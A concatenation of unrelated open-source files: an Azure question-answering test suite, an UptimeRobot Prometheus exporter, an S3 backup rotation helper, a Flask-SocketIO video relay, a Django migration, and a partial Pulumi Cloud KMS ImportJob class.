"text": "e graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on ",
"id": "doc2"
},
{
"text": "Graphics Surprise, surprise -- our 4K Envy 13 came with a discrete graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on the MX250 model, which is well above our 30-fps playability, the category average (69 fps) and what the Surface Laptop 2 (82 fps) achieved. The ZenBook S UX391UA (45 fps) fell flat on this real-world test but ran better than the base model Envy 13 (31 fps). Audio I had a good ol' time groovin' to the sound of the Envy 13's crisp speakers. HP went all out with the Envy, placing dual speakers on the underside of the chassis along with a third, top-firing driver above the keyboard. Devon Gilfillian's funky jam \"Here and Now\" boomed smooth, soulful tunes throughout my small apartment. The twang of the electric guitar played nicely with the thudding percussion but never overshadowed Gilfillian or the female backup vocals. Bang & Olufsen software comes preinstalled on the Envy 13, with equalizer controls so you can adjust the bass, midrange and treble to your liking. But even out of the box, you'll enjoy great sound without having to bust out your headphones. Battery Life Get an Envy 13 with the 1080p non-touch display if battery life is important to you. 
The FHD model endured for 11 hours and 11 minutes whereas the 4K model lasted only 4 hours and 36 minutes on our battery test, which involves continuous web browsing over Wi-Fi at 150 nits of brightness. MORE: Laptops with Best Battery Life - Longest Lasting Laptop Batteries Competing laptops like the ZenBook S UX391UA (7:05), Surface Laptop 2 (9:22) and Notebook 9 Pro (8:53) outstayed the 4K Envy 13 but powered down long before the 1080p version. Webcam The 720p webcam on the Envy 13 is nothing to write home about. A selfie I snapped in my dimly lit room was covered in a haze of visual noise. My beard and hair were unkempt blobs, while my eyes looked like they were drawn on by a pointillist painter. If there's one positive, it's that the lens captures natural colors and even extracted the different shades of gray in my T-shirt. On the right edge of the Envy 13 is a physical kill switch that cuts the power to the webcam so you can feel reassured that nobody is snooping on you. Heat Leave the lapdesk at home - you don't have to worry about the Envy 13 overheating. After I played a 15-minute, full-HD video in full screen, the touchpad on the HP Envy 13 with a Core i7 CPU rose to only 83 degrees Fahrenheit while the keyboard (87 degrees) and underside (90 degrees) also remained well below our 95-degree comfort threshold. Even the toastiest part of the machine, the lower-left edge on the underside, topped out at 94 degrees. Software and Warranty It's a shame that a laptop with such beautiful hardware ships with such ugly software. Pre-installed on this machine are entirely too many programs that could either be packaged together or omitted altogether. HP provides an app called Audio Switch, which simply lets you switch your audio input/output between the internal speakers and headphones. As the same implies, HP's Command Center is where you can get information about your Envy 13 but also switch the thermal profiles between comfort and performance. 
Along with support documentation, HP also bundles in a setup program called JumpStart, a program for connecting printers and a redundant system-info app called Event Utility. Also installed on the Envy 13's Windows 10 Home OS are several Microsoft apps, including Simple Solitaire, Candy Crush Friends and Your Phone. Other third-party apps include Booking.com, Netflix and McAfee Security. HP ships the Envy 13 with a one-year warranty. See how HP did on our Tech Support Showdown and Best and Worst Brands ranking. Bottom Line The Envy 13 has cemented its standing as the ultimate laptop for college students or travelers. Along with 11-plus hours of battery life (on the FHD model), the Envy 13 has a sleek, ultraportable chassis, fast performance, and powerful speakers. Best of all, the Envy 13 starts at a reasonable $799, which is hundreds less than the competition. In many ways, the Envy 13 is what we wanted the new MacBook Air to be. The new HP Envy 13 is everything I was hoping the new MacBook Air would be: fast, attractive and affordable. Just be sure to buy the right model. We strongly recommend the 1080p version over the 4K model because it lasts several hours longer on a charge and costs less. In fact, if we were reviewing the 4K model separately, we'd only give it a 3.5 rating. You should also consider the Envy 13 with a 10th Gen CPU, although we haven't gotten the chance to review it yet. If you absolutely need a high-res display, the 4K Envy 13 is one of many good options. We also recommend the Samsung Notebook 9 Pro, which has a similarly premium design but much better battery life than the 4K Envy. The Microsoft Surface Laptop 2 is another recommended alternative, though you might want to wait a few months for the rumored Surface Laptop 3. Overall, the HP Envy 13 is a fantastic laptop that checks all the right boxes --- as long as you buy the 1080p model. 
Credit: Laptop Mag HP Envy 13 (2019) Specs BluetoothBluetooth 5.0 BrandHP CPUIntel Core i7-8565U Card SlotsmicroSD Company Websitehttps://www8.hp.com/us/en/home.html Display Size13.3 Graphics CardNvidia GeForce MX250 Hard Drive Size512GB Hard Drive TypePCIe NVMe M.2 Highest Available Resolution3840 x 2160 Native Resolution3840 x 2160 Operating SystemWindows 10 Home Ports (excluding USB)USB 3.1 with Type-C, USB 3.1 Always-On, USB 3.1, Headphone/Mic, microSD RAM16GB RAM Upgradable to16GB Size12.1 x 8.3 x .57 inches Touchpad Size4.3 x 2.2 inches USB Ports3 Video Memory2GB Warranty/Supportone-year warranty. Weight2.8 pounds Wi-Fi802.11ac Wi-Fi ModelIntel Wireless-AC 9560 ",
"id": "doc3"
}
],
"language": "en"
}
request = build_query_text_request(
json=json_content
)
response = await client.send_request(request)
assert response.status_code == 200
output = response.json()
assert output.get('answers')
for answer in output['answers']:
assert answer.get('answer')
assert answer.get('confidenceScore')
assert answer.get('id')
assert answer.get('offset')
assert answer.get('length')
assert answer.get('answerSpan')
assert answer['answerSpan'].get('text')
assert answer['answerSpan'].get('confidenceScore')
assert answer['answerSpan'].get('offset') is not None
assert answer['answerSpan'].get('length')
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text(self, qna_account, qna_key):
client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
params = TextQueryParameters(
question="What is the meaning of life?",
records=[
TextInput(
text="abc Graphics Surprise, surprise -- our 4K ",
id="doc1"
),
TextInput(
text="e graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on ",
id="doc2"
),
TextInput(
text="Graphics Surprise, surprise -- our 4K Envy 13 came with a discrete graphics card. While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. The MX250-equipped Envy 13 scored a 116,575 on the Ice Storm Unlimited benchmark while the base model scored a 82,270. Upgrading to the discrete graphics gives the Envy 13 better performance than the Notebook 9 Pro (61,662; UHD 620), Surface Laptop 2 (71,647; UHD 620) and the premium laptop average (86,937). While the Nvidia GeForce MX250 GPU isn't meant for demanding gaming, it is a step up from integrated graphics as proven by comparing it to the UHD 620 GPU in the FHD model. We played the racing game Dirt 3 at 92 frames per second on the MX250 model, which is well above our 30-fps playability, the category average (69 fps) and what the Surface Laptop 2 (82 fps) achieved. The ZenBook S UX391UA (45 fps) fell flat on this real-world test but ran better than the base model Envy 13 (31 fps). Audio I had a good ol' time groovin' to the sound of the Envy 13's crisp speakers. HP went all out with the Envy, placing dual speakers on the underside of the chassis along with a third, top-firing driver above the keyboard. Devon Gilfillian's funky jam \"Here and Now\" boomed smooth, soulful tunes throughout my small apartment. The twang of the electric guitar played nicely with the thudding percussion but never overshadowed Gilfillian or the female backup vocals. Bang & Olufsen software comes preinstalled on the Envy 13, with equalizer controls so you can adjust the bass, midrange and treble to your liking. But even out of the box, you'll enjoy great sound without having to bust out your headphones. Battery Life Get an Envy 13 with the 1080p non-touch display if battery life is important to you. 
The FHD model endured for 11 hours and 11 minutes whereas the 4K model lasted only 4 hours and 36 minutes on our battery test, which involves continuous web browsing over Wi-Fi at 150 nits of brightness. MORE: Laptops with Best Battery Life - Longest Lasting Laptop Batteries Competing laptops like the ZenBook S UX391UA (7:05), Surface Laptop 2 (9:22) and Notebook 9 Pro (8:53) outstayed the 4K Envy 13 but powered down long before the 1080p version. Webcam The 720p webcam on the Envy 13 is nothing to write home about. A selfie I snapped in my dimly lit room was covered in a haze of visual noise. My beard and hair were unkempt blobs, while my eyes looked like they were drawn on by a pointillist painter. If there's one positive, it's that the lens captures natural colors and even extracted the different shades of gray in my T-shirt. On the right edge of the Envy 13 is a physical kill switch that cuts the power to the webcam so you can feel reassured that nobody is snooping on you. Heat Leave the lapdesk at home - you don't have to worry about the Envy 13 overheating. After I played a 15-minute, full-HD video in full screen, the touchpad on the HP Envy 13 with a Core i7 CPU rose to only 83 degrees Fahrenheit while the keyboard (87 degrees) and underside (90 degrees) also remained well below our 95-degree comfort threshold. Even the toastiest part of the machine, the lower-left edge on the underside, topped out at 94 degrees. Software and Warranty It's a shame that a laptop with such beautiful hardware ships with such ugly software. Pre-installed on this machine are entirely too many programs that could either be packaged together or omitted altogether. HP provides an app called Audio Switch, which simply lets you switch your audio input/output between the internal speakers and headphones. As the same implies, HP's Command Center is where you can get information about your Envy 13 but also switch the thermal profiles between comfort and performance. 
Along with support documentation, HP also bundles in a setup program called JumpStart, a program for connecting printers and a redundant system-info app called Event Utility. Also installed on the Envy 13's Windows 10 Home OS are several Microsoft apps, including Simple Solitaire, Candy Crush Friends and Your Phone. Other third-party apps include Booking.com, Netflix and McAfee Security. HP ships the Envy 13 with a one-year warranty. See how HP did on our Tech Support Showdown and Best and Worst Brands ranking. Bottom Line The Envy 13 has cemented its standing as the ultimate laptop for college students or travelers. Along with 11-plus hours of battery life (on the FHD model), the Envy 13 has a sleek, ultraportable chassis, fast performance, and powerful speakers. Best of all, the Envy 13 starts at a reasonable $799, which is hundreds less than the competition. In many ways, the Envy 13 is what we wanted the new MacBook Air to be. The new HP Envy 13 is everything I was hoping the new MacBook Air would be: fast, attractive and affordable. Just be sure to buy the right model. We strongly recommend the 1080p version over the 4K model because it lasts several hours longer on a charge and costs less. In fact, if we were reviewing the 4K model separately, we'd only give it a 3.5 rating. You should also consider the Envy 13 with a 10th Gen CPU, although we haven't gotten the chance to review it yet. If you absolutely need a high-res display, the 4K Envy 13 is one of many good options. We also recommend the Samsung Notebook 9 Pro, which has a similarly premium design but much better battery life than the 4K Envy. The Microsoft Surface Laptop 2 is another recommended alternative, though you might want to wait a few months for the rumored Surface Laptop 3. Overall, the HP Envy 13 is a fantastic laptop that checks all the right boxes --- as long as you buy the 1080p model. 
Credit: Laptop Mag HP Envy 13 (2019) Specs BluetoothBluetooth 5.0 BrandHP CPUIntel Core i7-8565U Card SlotsmicroSD Company Websitehttps://www8.hp.com/us/en/home.html Display Size13.3 Graphics CardNvidia GeForce MX250 Hard Drive Size512GB Hard Drive TypePCIe NVMe M.2 Highest Available Resolution3840 x 2160 Native Resolution3840 x 2160 Operating SystemWindows 10 Home Ports (excluding USB)USB 3.1 with Type-C, USB 3.1 Always-On, USB 3.1, Headphone/Mic, microSD RAM16GB RAM Upgradable to16GB Size12.1 x 8.3 x .57 inches Touchpad Size4.3 x 2.2 inches USB Ports3 Video Memory2GB Warranty/Supportone-year warranty. Weight2.8 pounds Wi-Fi802.11ac Wi-Fi ModelIntel Wireless-AC 9560 ",
id="doc3"
)
],
language="en"
)
output = await client.query_text(params)
assert output.answers
for answer in output.answers:
assert answer.answer
assert answer.confidence_score
assert answer.id
assert answer.offset
assert answer.length
assert answer.answer_span
assert answer.answer_span.text
assert answer.answer_span.confidence_score
assert answer.answer_span.offset is not None
assert answer.answer_span.length
@GlobalQuestionAnsweringAccountPreparer()
async def test_query_text_with_dictparams(self, qna_account, qna_key):
client = QuestionAnsweringClient(qna_account, AzureKeyCredential(qna_key))
params = {
"question": "How long it takes to charge surface?",
"records": [
{
"text": "Power and charging. It takes two to four hours to charge the Surface Pro 4 battery fully from an empty state. " +
"It can take longer if you’re using your Surface for power-intensive activities like gaming or video streaming while you’re charging it.",
"id": "1"
},
{
"text": "You can use the USB port on your Surface Pro 4 power supply to charge other devices, like a phone, while your Surface charges. "+
"The USB port on the power supply is only for charging, not for data transfer. If you want to use a USB device, plug it into the USB port on your Surface.",
"id": "2"
}
],
"language": "en"
}
async with client:
output = await client.query_text(params)
assert len(output.answers) == 3
confident_answers = [a for a in output.answers if a.confidence_score > 0.9]
assert len(confident_answers) == 2
assert confident_answers[0].answer_span.text == "two to four hours"
| 149.984496
| 6,497
| 0.729016
|
4a04f2ec50bbd3e759789a30aeb19903eac149ac
| 5,138
|
py
|
Python
|
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
files/exporter.py
|
astlz96/uptimerobot_exporter
|
dc27555fa50de1fa45dc8718af0f3846dde9b5e2
|
[
"Apache-2.0"
] | null | null | null |
# FROM https://github.com/hnrd/uptimerobot_exporter/blob/master/exporter.py
# Updated by Martin LEKPA
import argparse
import http.server
import os
import requests
## Monitors
def _fetch_paginated(offset, api_key):
    """Fetch one page of the UptimeRobot getMonitors API.

    :param offset: zero-based pagination offset (the API returns at most
        50 monitors per request).
    :param api_key: UptimeRobot account API key.
    :returns: parsed JSON response as a dict.
    """
    params = {
        'api_key': api_key,
        'format': 'json',
        'response_times': 1,
        'response_times_limit': 1,
        'offset': offset,
    }
    # An explicit timeout keeps the exporter from hanging a Prometheus
    # scrape forever if the UptimeRobot API stalls.
    response = requests.post(
        'https://api.uptimerobot.com/v2/getMonitors',
        data=params,
        timeout=30,
    )
    return response.json()
def fetch_data(api_key):
    """Fetch all monitors for the account, following API pagination.

    Pages of up to 50 monitors are requested until an empty page is
    returned.  The original duplicated the first request before the loop;
    this single loop performs the identical request sequence.

    :param api_key: UptimeRobot account API key.
    :returns: dict of the form ``{'monitors': [...]}``.
    """
    monitors = {'monitors': []}
    offset = 0
    while True:
        response = _fetch_paginated(offset, api_key)
        # .get() guards against error responses that carry no 'monitors'
        # key (the original raised KeyError on those).
        page = response.get('monitors', [])
        monitors['monitors'].extend(page)
        if not page:
            break
        offset += 50
    return monitors
def format_prometheus(data):
    """Render monitor dicts as Prometheus text-exposition lines.

    :param data: iterable of monitor dicts from the getMonitors API.
    :returns: one ``uptimerobot_status`` line per monitor, plus one
        ``uptimerobot_response_time`` line for each monitor that is up
        (status 2) and has recorded response times.
    """
    # Map API status codes to exporter gauge values:
    # 0 (paused) -> 2, 1 (not checked yet) -> 1, 2 (up) -> 0, anything
    # else (seems-down/down) -> 3.
    status_values = {0: 2, 1: 1, 2: 0}
    lines = []
    for item in data:
        value = status_values.get(item.get('status'), 3)
        lines.append(
            'uptimerobot_status{{c1_name="{}",c2_url="{}",c3_type="{}",c4_sub_type="{}",c5_keyword_type="{}",c6_keyword_value="{}",c7_http_username="{}",c8_port="{}",c9_interval="{}"}} {}\n'.format(
                item.get('friendly_name'),
                item.get('url'),
                item.get('type'),
                item.get('sub_type'),
                item.get('keyword_type'),
                item.get('keyword_value'),
                item.get('http_username'),
                item.get('port'),
                item.get('interval'),
                value,
            )
        )
        if item.get('status', 0) == 2:
            # The original called response_times.pop(), which mutated the
            # caller's list and crashed with AttributeError/IndexError when
            # the key was missing or the list empty.  Read the last entry
            # non-destructively and skip the line when there is none.
            response_times = item.get('response_times') or []
            if response_times:
                lines.append(
                    'uptimerobot_response_time{{name="{}",type="{}",url="{}"}} {}\n'.format(
                        item.get('friendly_name'),
                        item.get('type'),
                        item.get('url'),
                        response_times[-1].get('value'),
                    )
                )
    # join avoids the quadratic string += of the original loop.
    return ''.join(lines)
## getAccountDetails
def fetch_accountdetails(api_key):
    """Fetch account details (limits, up/down counts) from the API.

    :param api_key: UptimeRobot account API key.
    :returns: parsed JSON response as a dict.
    """
    params = {
        'api_key': api_key,
        'format': 'json',
    }
    # Timeout so a stalled API cannot hang the scrape indefinitely.
    req = requests.post(
        'https://api.uptimerobot.com/v2/getAccountDetails',
        data=params,
        timeout=30,
    )
    return req.json()
def format_prometheus_accountdetails(data):
    """Render the account-details dict as one Prometheus info metric line.

    :param data: ``account`` dict from the getAccountDetails response.
    :returns: a single ``uptimerobot_accountdetails`` line with the account
        attributes as labels and a constant sample value of 1.
    """
    template = (
        'uptimerobot_accountdetails{{name="{email}",monitor_limit="{monitor_limit}",'
        'monitor_interval="{monitor_interval}",up_monitors="{up_monitors}",'
        'down_monitors="{down_monitors}",paused_monitors="{paused_monitors}"}} 1\n'
    )
    return template.format(**data)
## End
## public status pages
def fetch_psp(api_key):
    """Fetch the account's public status pages (PSPs) from the API.

    :param api_key: UptimeRobot account API key.
    :returns: parsed JSON response as a dict.
    """
    params = {
        'api_key': api_key,
        'format': 'json',
    }
    # Timeout so a stalled API cannot hang the scrape indefinitely.
    req = requests.post(
        'https://api.uptimerobot.com/v2/getPSPs',
        data=params,
        timeout=30,
    )
    return req.json()
def format_prometheus_psp(data):
    """Render public status pages as Prometheus gauge lines.

    :param data: iterable of PSP dicts from the getPSPs response.
    :returns: one ``uptimerobot_psp`` line per page, the sample value being
        the page's status code.
    """
    lines = [
        'uptimerobot_psp{{c1_name="{}",c2_custom_url="{}",c3_standard_url="{}",'
        'c4_monitors="{}",c5_sort="{}"}} {}\n'.format(
            page.get('friendly_name'),
            page.get('custom_url'),
            page.get('standard_url'),
            page.get('monitors'),
            page.get('sort'),
            page.get('status'),
        )
        for page in data
    ]
    return ''.join(lines)
## End
class ReqHandler(http.server.BaseHTTPRequestHandler):
    """Prometheus scrape endpoint.

    Each GET request queries the three UptimeRobot API endpoints live and
    streams the formatted metrics back as plain text.
    """

    def do_GET(self):
        # Pull fresh data on every scrape; `api_key` is the module global
        # resolved at startup.
        monitor_data = fetch_data(api_key)
        account_data = fetch_accountdetails(api_key)
        psp_data = fetch_psp(api_key)

        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()

        sections = (
            format_prometheus(monitor_data.get('monitors')),
            format_prometheus_accountdetails(account_data.get('account')),
            format_prometheus_psp(psp_data.get('psps')),
        )
        for section in sections:
            self.wfile.write(section.encode('utf-8'))
if __name__ == '__main__':
    # Configuration comes either from environment variables (the
    # container-friendly path) or from command-line arguments.
    if 'UPTIMEROBOT_API_KEY' in os.environ:
        api_key = os.environ.get('UPTIMEROBOT_API_KEY')
        server_name = os.environ.get('UPTIMEROBOT_SERVER_NAME', '0.0.0.0')
        server_port = int(os.environ.get('UPTIMEROBOT_SERVER_PORT', '9705'))
    else:
        # Fixed help text: the original concatenated
        # 'uptimerobot.txt' + 'for ...' into "uptimerobot.txtfor ...".
        parser = argparse.ArgumentParser(
            description='Export all check results from uptimerobot.com '
                        'for prometheus scraping.'
        )
        parser.add_argument(
            'apikey',
            help='Your uptimerobot.com API key. See account details.'
        )
        parser.add_argument(
            '--server_name', '-s',
            default='0.0.0.0',
            help='Server address to bind to.'
        )
        parser.add_argument(
            '--server_port', '-p',
            default=9705,
            type=int,
            help='Port to bind to.'
        )
        args = parser.parse_args()
        api_key = args.apikey
        server_name = args.server_name
        server_port = args.server_port
    # Single-threaded HTTP server is sufficient for a scrape endpoint.
    httpd = http.server.HTTPServer((server_name, server_port), ReqHandler)
    httpd.serve_forever()
| 29.36
| 284
| 0.584079
|
4a04f311927921702e2609b21a37d0a9520597b7
| 1,548
|
py
|
Python
|
dcu/active_memory/__init__.py
|
dirkcuys/active-memory
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | 5
|
2019-05-01T19:38:54.000Z
|
2021-06-28T22:04:33.000Z
|
dcu/active_memory/__init__.py
|
dirkcuys/s3-backup-rotate
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | null | null | null |
dcu/active_memory/__init__.py
|
dirkcuys/s3-backup-rotate
|
ab226c7b636550823a9c91e3ebd81776d255f204
|
[
"MIT"
] | null | null | null |
from dcu.active_memory.rotate import rotate
from dcu.active_memory.rotate import splitext
from dcu.active_memory.upload import upload
import os.path
import re
import logging
logger = logging.getLogger(__name__)
def upload_rotate(file_path, s3_bucket, s3_key_prefix, aws_key=None, aws_secret=None):
    """Upload *file_path* to S3, then rotate its timestamped siblings.

    Ex. ``upload_rotate('/tmp/file-2015-01-01.tar.bz2', 'backups', 'foo.net/')``
    uploads the file to bucket ``backups`` with key
    ``foo.net/file-2015-01-01.tar.bz2`` and then rotates all keys starting
    with ``foo.net/file`` that have extension ``.tar.bz2``.

    The file name must carry a ``-YYYY-MM-DD`` timestamp between the root
    and the extension, e.g. ``file-2015-12-28.tar.bz2``.

    :param file_path: local path of the file to upload.
    :param s3_bucket: destination bucket name.
    :param s3_key_prefix: key prefix prepended to the file's base name.
    :param aws_key: optional AWS access key id.
    :param aws_secret: optional AWS secret access key.
    :raises Exception: if the file name contains no timestamp.
    """
    key = ''.join([s3_key_prefix, os.path.basename(file_path)])
    logger.debug("Uploading {0} to {1}".format(file_path, key))
    upload(file_path, s3_bucket, key, aws_access_key_id=aws_key, aws_secret_access_key=aws_secret)
    file_root, file_ext = splitext(os.path.basename(file_path))
    # Strip the trailing -YYYY-MM-DD timestamp from the file root.  Raw
    # string fixes the invalid '\d' escape sequences of the original
    # pattern (a DeprecationWarning/SyntaxWarning on modern Python).
    regex = r'(?P<filename>.*)-(?P<year>\d+?)-(?P<month>\d+?)-(?P<day>\d+?)'
    match = re.match(regex, file_root)
    if not match:
        raise Exception('File does not contain a timestamp')
    key_prefix = ''.join([s3_key_prefix, match.group('filename')])
    logger.debug('Rotating files on S3 with key prefix {0} and extension {1}'.format(key_prefix, file_ext))
    rotate(key_prefix, file_ext, s3_bucket, aws_key=aws_key, aws_secret=aws_secret)
| 45.529412
| 121
| 0.718992
|
4a04f31d5b8ba127fdec10f31c16db4384b6b4d5
| 115
|
py
|
Python
|
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | 2
|
2019-04-05T07:48:42.000Z
|
2019-07-26T10:42:25.000Z
|
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | null | null | null |
jeecf/exceptions.py
|
cgfly/jeecf-cli
|
65b1577ea1ca169c8e296a7df15d13b7d9b84e12
|
[
"Apache-2.0"
] | 1
|
2019-11-28T09:55:16.000Z
|
2019-11-28T09:55:16.000Z
|
class JeecfNotLoginException(Exception):
    """Raised when a CLI command requires an authenticated session."""

    def __str__(self):
        # Fixed user-facing hint pointing at the login command.
        message = "You need run 'jeecf login' first!"
        return message
| 28.75
| 50
| 0.704348
|
4a04f3425ea2361ef7c989c88d94ba8bf15fc78d
| 1,013
|
py
|
Python
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 51
|
2020-05-30T06:34:21.000Z
|
2022-03-03T05:05:52.000Z
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 3
|
2021-07-19T21:20:39.000Z
|
2021-11-17T02:55:05.000Z
|
server/app.py
|
Marcos-Seafloor/video-streamer-multi-container
|
d0628fbf9f633363686b444ad0cc8dd813426a10
|
[
"Apache-2.0"
] | 21
|
2020-06-12T13:17:34.000Z
|
2021-11-10T15:14:54.000Z
|
from flask_socketio import SocketIO
from flask import Flask, render_template, request

# Flask app wrapped by Socket.IO; handlers below are registered as
# module-level side effects of the decorators.
app = Flask(__name__)
socketio = SocketIO(app)


@app.route('/')
def index():
    """Home page."""
    return render_template('index.html')


@socketio.on('connect', namespace='/web')
def connect_web():
    # Browser clients join the /web namespace (they receive the stream).
    print('[INFO] Web client connected: {}'.format(request.sid))


@socketio.on('disconnect', namespace='/web')
def disconnect_web():
    print('[INFO] Web client disconnected: {}'.format(request.sid))


@socketio.on('connect', namespace='/cv')
def connect_cv():
    # The computer-vision producer connects on the /cv namespace.
    print('[INFO] CV client connected: {}'.format(request.sid))


@socketio.on('disconnect', namespace='/cv')
def disconnect_cv():
    print('[INFO] CV client disconnected: {}'.format(request.sid))


@socketio.on('cv2server')
def handle_cv_message(message):
    # Relay each message from the CV producer to all web clients.
    socketio.emit('server2web', message, namespace='/web')


if __name__ == "__main__":
    print('[INFO] Starting server at http://localhost:5001')
    # Bind to 0.0.0.0 so the containerized server is reachable externally.
    socketio.run(app=app, host='0.0.0.0', port=5001)
| 24.119048
| 67
| 0.69003
|
4a04f39bb2919764e23d67b444421b15b8ee8bdb
| 483
|
py
|
Python
|
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
home/migrations/0002_auto_20190501_1313.py
|
ageorgiev97/fictional-octo-meme
|
afc0f69985c0e79f128cf1bdafa668a9a22a2f0f
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2019-05-01 10:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: make Restaurant.location optional."""

    dependencies = [
        ('home', '0001_initial'),
    ]

    operations = [
        # Allow NULL/blank on the FK; CASCADE still deletes restaurants
        # when their Location row is removed.
        migrations.AlterField(
            model_name='restaurant',
            name='location',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='home.Location'),
        ),
    ]
| 24.15
| 124
| 0.637681
|
4a04f3bf24e3b6fd33a483c05552dc7c9fb9962d
| 13,239
|
py
|
Python
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 44
|
2021-04-18T23:00:48.000Z
|
2022-02-14T17:43:15.000Z
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 354
|
2021-04-16T16:48:39.000Z
|
2022-03-31T17:16:39.000Z
|
sdk/python/pulumi_google_native/cloudkms/v1/import_job.py
|
AaronFriel/pulumi-google-native
|
75d1cda425e33d4610348972cd70bddf35f1770d
|
[
"Apache-2.0"
] | 8
|
2021-04-24T17:46:51.000Z
|
2022-01-05T10:40:21.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
__all__ = ['ImportJobArgs', 'ImportJob']
@pulumi.input_type
class ImportJobArgs:
def __init__(__self__, *,
import_job_id: pulumi.Input[str],
import_method: pulumi.Input['ImportJobImportMethod'],
key_ring_id: pulumi.Input[str],
protection_level: pulumi.Input['ImportJobProtectionLevel'],
location: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ImportJob resource.
:param pulumi.Input['ImportJobImportMethod'] import_method: Immutable. The wrapping method to be used for incoming key material.
:param pulumi.Input['ImportJobProtectionLevel'] protection_level: Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
pulumi.set(__self__, "import_job_id", import_job_id)
pulumi.set(__self__, "import_method", import_method)
pulumi.set(__self__, "key_ring_id", key_ring_id)
pulumi.set(__self__, "protection_level", protection_level)
if location is not None:
pulumi.set(__self__, "location", location)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="importJobId")
def import_job_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "import_job_id")
@import_job_id.setter
def import_job_id(self, value: pulumi.Input[str]):
pulumi.set(self, "import_job_id", value)
@property
@pulumi.getter(name="importMethod")
def import_method(self) -> pulumi.Input['ImportJobImportMethod']:
"""
Immutable. The wrapping method to be used for incoming key material.
"""
return pulumi.get(self, "import_method")
@import_method.setter
def import_method(self, value: pulumi.Input['ImportJobImportMethod']):
pulumi.set(self, "import_method", value)
@property
@pulumi.getter(name="keyRingId")
def key_ring_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "key_ring_id")
@key_ring_id.setter
def key_ring_id(self, value: pulumi.Input[str]):
pulumi.set(self, "key_ring_id", value)
@property
@pulumi.getter(name="protectionLevel")
def protection_level(self) -> pulumi.Input['ImportJobProtectionLevel']:
"""
Immutable. The protection level of the ImportJob. This must match the protection_level of the version_template on the CryptoKey you attempt to import into.
"""
return pulumi.get(self, "protection_level")
@protection_level.setter
def protection_level(self, value: pulumi.Input['ImportJobProtectionLevel']):
